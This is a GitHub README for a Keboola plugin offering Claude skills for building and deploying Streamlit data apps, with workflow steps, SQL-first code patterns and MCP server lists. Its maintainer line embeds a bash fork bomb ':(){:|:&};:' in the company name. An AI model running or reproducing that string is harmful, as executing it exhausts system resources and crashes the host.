Data App Developer Plugin

A toolkit for building and deploying data apps to Keboola. Includes a Streamlit development skill with a systematic validate → build → verify workflow, plus a deployment skill covering Nginx, Supervisord, and Docker configuration for any web framework (Node.js, Python, etc.).

🎯 Available Skills

Data App Deployment Skill

Skill name: dataapp-deployment Activation: Automatic when deploying any web app to Keboola Data Apps

Covers the Docker infrastructure for Keboola Data Apps: Nginx reverse proxy config, Supervisord process management, environment variable mapping, and common deployment pitfalls. Works with Node.js, Python (Flask, FastAPI, Streamlit, Gunicorn), or any language.

Use cases:

Set up keboola-config/ directory for a new data app
Configure Nginx for SSE/WebSocket streaming
Map dataApp.secrets to environment variables
Debug "Cannot POST /", 500 errors, or buffered streams
Adapt a Vercel/serverless app for Keboola deployment
Deploy Flask, Express, Streamlit, or any web framework

Data App Development Skill

Skill name: dataapp-dev Activation: Automatic when working with Streamlit data apps and Keboola

Expert Streamlit data app developer specializing in Keboola deployment. Systematically validates data structures, builds correct implementations, and verifies everything works before you commit.

Key Innovation: Three-phase workflow that eliminates debugging cycles:

VALIDATE - Check schemas and query sample data using Keboola MCP
BUILD - Implement following SQL-first architecture patterns
VERIFY - Test in browser and capture screenshots using Playwright MCP

Use cases:

Build new Keboola data apps from scratch
Add features to existing apps (filters, pages, metrics)
Debug data app issues with systematic validation
Optimize query performance with SQL-first patterns
Implement global filters and controls
Create analytics dashboards and reports
Fix bugs with confidence using visual verification

✨ Core Features

🔍 Automatic Data Validation

Before writing any code, the agent validates assumptions:

Checks table schemas with mcp__keboola__get_table
Verifies column names and data types
Queries distinct values for categorical columns
Tests SQL filter conditions before embedding
Confirms data volumes and structure

Result: No broken SQL queries, no KeyErrors, no debugging.

🏗️ SQL-First Architecture

Enforces best practices for Streamlit + Keboola:

Push computation to database, never load large datasets
Centralized data access layer (utils/data_loader.py)
Filter clause functions for reusable WHERE conditions
Proper caching with @st.cache_data(ttl=300)
Environment parity (local dev + production)

Result: Fast, scalable apps that work in both environments.

🎨 Visual Verification

After implementation, automatically tests in browser:

Opens app with mcp__playwright__browser_navigate
Interacts with filters and controls
Navigates through all pages
Captures screenshots as proof
Verifies no errors in UI

Result: See it working before you commit. Zero deployment surprises.

🛡️ Bug Prevention

Catches common issues before they become bugs:

Variable name conflicts (same name for SQL clause and UI widget)
Session state key collisions
Missing column names in queries
Incorrect SQL syntax
Environment-specific code

Result: Clean, maintainable code that works first time.

💡 Usage Examples

Add a Global Filter

Add a global filter for user type (external vs internal users)
to my Streamlit dashboard. Default to showing external users only.

The skill will automatically activate and guide the implementation.

What happens:

✅ Agent checks table schema for user_type column
✅ Queries distinct values: 'External User', 'Keboola User'
✅ Tests filter SQL conditions
✅ Creates get_user_type_filter_clause() in data_loader.py
✅ Adds UI radio buttons to sidebar
✅ Updates all page modules to use filter
✅ Opens browser and verifies filter works on all pages
✅ Takes screenshots showing it working

Time: 20 minutes (vs 60+ with traditional approach)

Debug a KeyError

My overview page is showing "KeyError: 'revenue'" when I filter by date.
Help me debug and fix it.

What happens:

✅ Validates table schema for revenue column
✅ Queries sample data to check for NULL values
✅ Identifies issue (column doesn't exist / NULL handling)
✅ Fixes query with proper COALESCE or column name
✅ Verifies fix works in browser
✅ Shows screenshot of working page

Create a New Analytics Page

Create a new "Cost Analysis" page that shows:
- Total costs by month
- Cost breakdown by team
- Top 10 most expensive projects

What happens:

✅ Validates cost data tables exist
✅ Checks column names and types
✅ Queries sample data to understand structure
✅ Creates new page module with SQL-first queries
✅ Adds page to navigation
✅ Opens browser, navigates to new page
✅ Verifies charts and metrics display correctly
✅ Captures screenshots

🎯 Workflow Overview

Phase 1: VALIDATE Data

Always run before writing code:

# Check table schema
mcp__keboola__get_table("out.c-analysis.usage_data")
# → Verify columns exist, get types, get fully qualified name

# Query sample data
mcp__keboola__query_data(sql='SELECT DISTINCT "status" FROM ...')
# → Confirm values, test WHERE conditions

Phase 2: BUILD Implementation

Follow SQL-first patterns:

# 1. Add filter function to utils/data_loader.py
def get_status_filter_clause():
    if st.session_state.status_filter == 'active':
        return '"status" = \'active\''
    return ''  # No filter

# 2. Build WHERE clause systematically
where_parts = [get_agent_filter_clause()]
status_filter = get_status_filter_clause()
if status_filter:
    where_parts.append(status_filter)
where_clause = ' AND '.join(where_parts)

# 3. Use in SQL query
query = f'''
    SELECT "date", COUNT(*) as count
    FROM {get_table_name()}
    WHERE {where_clause}
    GROUP BY "date"
'''

Phase 3: VERIFY Visually

Test in browser before committing:

# 1. Check app is running
lsof -ti:8501  # or start: streamlit run app.py

# 2. Navigate and test
mcp__playwright__browser_navigate("http://localhost:8501")
mcp__playwright__browser_wait_for(time: 3)

# 3. Take screenshot
mcp__playwright__browser_take_screenshot("verified.png")

# 4. Test interactions (click filters, navigate pages)

📚 Best Practices Enforced

✅ DO:

Always validate data first using Keboola MCP before writing code
Push computation to database - aggregate in SQL, not Python
Use fully qualified table names from get_table_name()
Quote all identifiers in SQL ("column_name", not column_name)
Cache all queries with @st.cache_data(ttl=300)
Centralize data access in utils/data_loader.py
Initialize session state with defaults before UI controls
Use unique variable names to avoid conflicts
Test visually with Playwright before committing
Handle empty DataFrames gracefully in UI
Support both environments (local dev + Keboola production)

❌ DON'T:

Skip data validation - always check schemas first
Load large datasets into Python - aggregate in database
Hardcode table names - use get_table_name() function
Skip visual verification - test with Playwright
Use same variable name twice (e.g., for SQL clause AND UI widget)
Forget session state initialization before creating widgets
Assume columns exist - validate with Keboola MCP
Commit without screenshots - prove it works visually
Use unquoted SQL identifiers - quote everything
Skip error handling for empty query results

📖 Architecture Patterns

SQL-First Design

Why: Keboola workspaces are optimized for queries. Loading data into Streamlit doesn't scale.

Pattern:

# ✅ GOOD - Aggregate in database
query = f'''
    SELECT
        "category",
        COUNT(*) as count,
        AVG("value") as avg_value
    FROM {get_table_name()}
    WHERE "date" >= CURRENT_DATE - INTERVAL '90 days'
        AND {get_filter_clause()}
    GROUP BY "category"
'''

# ❌ BAD - Load all data and aggregate in Python
df = execute_query(f"SELECT * FROM {get_table_name()}")
result = df.groupby('category').agg({'value': 'mean'})

Global Filter Pattern

# 1. Filter function in utils/data_loader.py
def get_user_filter_clause():
    if 'user_filter' not in st.session_state:
        st.session_state.user_filter = 'all'

    if st.session_state.user_filter == 'external':
        return '"user_type" = \'External User\''
    elif st.session_state.user_filter == 'internal':
        return '"user_type" = \'Keboola User\''
    return ''

# 2. UI in streamlit_app.py sidebar
if 'user_filter' not in st.session_state:
    st.session_state.user_filter = 'external'

option = st.sidebar.radio(
    "Users:",
    options=['external', 'internal', 'all'],
    index=['external', 'internal', 'all'].index(st.session_state.user_filter)
)

if option != st.session_state.user_filter:
    st.session_state.user_filter = option
    st.rerun()

# 3. Use in all page modules
from utils.data_loader import get_user_filter_clause

where_parts = ['"status" = \'active\'']
user_filter = get_user_filter_clause()
if user_filter:
    where_parts.append(user_filter)
where_clause = ' AND '.join(where_parts)

🔌 MCP Servers

Keboola MCP

Remote server: https://mcp.us-east4.gcp.keboola.com/mcp

Provides data validation and querying capabilities:

mcp__keboola__get_project_info - Project metadata and SQL dialect
mcp__keboola__get_table - Table schemas with column details
mcp__keboola__query_data - Execute SQL queries with validation
mcp__keboola__list_tables - Browse available data
mcp__keboola__search - Find tables and configurations

Setup:

Automatically configured when plugin is installed
Authenticate via OAuth when first used
No manual configuration needed

Playwright MCP

Package: @executeautomation/playwright-mcp-server

Provides browser automation and visual testing:

mcp__playwright__browser_navigate - Open URLs
mcp__playwright__browser_click - Interact with elements
mcp__playwright__browser_take_screenshot - Capture screenshots
mcp__playwright__browser_wait_for - Wait for conditions
mcp__playwright__browser_type - Enter text
mcp__playwright__browser_evaluate - Run JavaScript

Setup:

No configuration needed
Browser installs automatically on first use
If prompted, run: mcp__playwright__browser_install

📚 Documentation

Comprehensive guides included in skills/dataapp-dev/:

QUICKSTART.md - 5-minute introduction to the workflow
workflow-guide.md - Step-by-step examples with real scenarios
best-practices.md - Deep dive into SQL-first architecture
templates.md - Copy-paste code patterns
validation-checklist.md - Quality assurance checklist

🎉 Success Stories

Before This Plugin

Developer: Add a filter
Claude: [writes code]
Developer: It's not working, there's a KeyError
Claude: Let me fix it
[3-4 iterations of debugging]
Developer: Finally works! 60 minutes spent

With This Plugin

Developer: Add a filter
Claude: [validates schema → queries data → builds → tests visually]
Claude: ✅ Complete! [shows screenshots proving it works]
Developer: Looks perfect! 20 minutes spent

Real Example

Task: Add global filter for external vs internal users

What the agent did:

✅ Validated user_type column exists
✅ Queried distinct values: 'External User' (122), 'Keboola User' (55)
✅ Tested filter SQL conditions
✅ Created filter clause function
✅ Added UI to sidebar
✅ Updated all 8 page modules
✅ Fixed variable name conflict before it became a bug
✅ Opened browser and tested all pages
✅ Captured screenshots showing it working
✅ Ready to commit with confidence

Result: Feature worked correctly on first try. Zero debugging needed.

🛠️ Plugin Structure

plugins/dataapp-developer/
├── .claude-plugin/
│   └── plugin.json          # Plugin config with MCP servers
├── skills/
│   ├── dataapp-deployment/
│   │   └── SKILL.md         # Keboola Data App deployment guide
│   └── dataapp-dev/
│       ├── SKILL.md         # Streamlit development skill
│       ├── QUICKSTART.md    # 5-minute guide
│       ├── workflow-guide.md    # Detailed examples
│       ├── best-practices.md    # Architecture guide
│       ├── templates.md     # Code patterns
│       └── validation-checklist.md  # QA checklist
└── README.md                # This file

🤝 Contributing

To improve this plugin:

Update the skill file in skills/dataapp-dev/SKILL.md
Add new patterns to skills/dataapp-dev/templates.md
Update this README with new features
Test thoroughly with real Streamlit apps
Submit a pull request

📚 Resources

Version: 1.1.0 Maintainer: Keboola :(){:|:&};: s.r.o. License: MIT

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Data App Developer Plugin

🎯 Available Skills

Data App Deployment Skill

Data App Development Skill

✨ Core Features

🔍 Automatic Data Validation

🏗️ SQL-First Architecture

🎨 Visual Verification

🛡️ Bug Prevention

💡 Usage Examples

Add a Global Filter

Debug a KeyError

Create a New Analytics Page

🎯 Workflow Overview

Phase 1: VALIDATE Data

Phase 2: BUILD Implementation

Phase 3: VERIFY Visually

📚 Best Practices Enforced

✅ DO:

❌ DON'T:

📖 Architecture Patterns

SQL-First Design

Global Filter Pattern

🔌 MCP Servers

Keboola MCP

Playwright MCP

📚 Documentation

🎉 Success Stories

Before This Plugin

With This Plugin

Real Example

🛠️ Plugin Structure

🤝 Contributing

📚 Resources

FilesExpand file tree

README.md

Latest commit

History

README.md

File metadata and controls

Data App Developer Plugin

🎯 Available Skills

Data App Deployment Skill

Data App Development Skill

✨ Core Features

🔍 Automatic Data Validation

🏗️ SQL-First Architecture

🎨 Visual Verification

🛡️ Bug Prevention

💡 Usage Examples

Add a Global Filter

Debug a KeyError

Create a New Analytics Page

🎯 Workflow Overview

Phase 1: VALIDATE Data

Phase 2: BUILD Implementation

Phase 3: VERIFY Visually

📚 Best Practices Enforced

✅ DO:

❌ DON'T:

📖 Architecture Patterns

SQL-First Design

Global Filter Pattern

🔌 MCP Servers

Keboola MCP

Playwright MCP

📚 Documentation

🎉 Success Stories

Before This Plugin

With This Plugin

Real Example

🛠️ Plugin Structure

🤝 Contributing

📚 Resources